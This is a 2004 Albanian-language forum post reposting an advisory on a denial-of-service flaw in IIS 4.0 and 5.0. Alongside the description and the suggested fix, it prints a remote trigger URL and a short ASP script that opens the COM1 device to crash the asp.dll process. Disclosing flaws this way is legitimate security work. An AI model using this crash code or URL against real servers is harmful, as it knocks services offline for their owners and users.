Kein Macromedia Flashplayer? Klick bitte hier!
Dardania.de
Kethu Mbrapa   Dardania.de > Shkenca > Informatika
Emri
Fjalėkalimi
Informatika Gjithēka mbi informatikėn dhe internetin...



Pėrgjigju
 
Funksionet e Temės Shfaq Modėt
Vjetėr 16-03-04, 01:15   #1
BERLINERBOY
 
Anėtarėsuar: 15-03-04
Vendndodhja: gjermanij(Berlin)
Postime: 11
BERLINERBOY e ka pezulluar reputacionin
Dėrgo mesazh me anė tė MSN tek BERLINERBOY Dėrgo mesazh me anė tė Yahoo tek BERLINERBOY
Gabim Microsoft Internet Information Services (IIS) dhe Denial Of

RENDESIA : E Larte

Sistemet e Infektuara:
Microsoft Windows NT 4.0 Internet Information Services 4.0
Microsoft Windows 2000 Internet Information Services 5.0


Pershkrim:
Hapje dhe lexim i fileve te sistemit ( com1,com2,etc.) duke perdorur Scripting.FileSystemObject do coje ne crash procesorin ASP ( asp.dll)

Shembull:

1.Exploit lokal
N.q.s keni lejen per te krijuar file .asp me kete script mund te coni ne krash procesonin e ASP

2.Exploit ne distance
Duke kaluar emrat e file per parametra te scriptit mund te hapni e te laxoni informacione. Duke i kaluar parametrat si file sistemi do crashoje procesorin.

http://host.int/scripts/script.asp?script=com1

3.Exploiti ne ASP



Dim strFileName, objFSO, objFile

Set objFSO = Server.CreateObject("Scripting.FileSystemObject")

strFileName = "com1"

Set objFile = objFSO.OpenTextFile(strFileName)

Response.Write objFile.ReadAll

objFile.Close


4.Zgjidhja


Duhet thjesht te rregulloni Scripting.FileSystemObject qe te kontrolloje emrat e file para se t'i hape.


BERLINERBOY nuk mban asnje lloj pergjegjesie per perdorimin
e informacionave te mesiperme qe u parashtruan per qellim
teresisht informativ. :-)


BERLINERBOY Nuk ėshtė nė linjė   Pėrgjigju Me Kuotė
Nyje Interesante
Pėrgjigju


Anėtarėt aktiv qė janė duke parė kėtė Temė: 1 (0 Anėtarėt dhe 1 Guests)
 
Funksionet e Temės
Shfaq Modėt

Rregullat E Postimit
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is ON
Figurinat Janė ON
Kodi [IMG] ėshtė ON
Kodi HTML ėshtė OFF



Hyrja | Chat | Diskutime | Muzik Shqip | Poezi | Lojra | Kontakt


1999 - 2014 Forumi Dardania

Te gjitha kohėt janė nė GMT +1. Ora tani ėshtė 16:34.
Powered by vBulletin Version 3.8.7
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.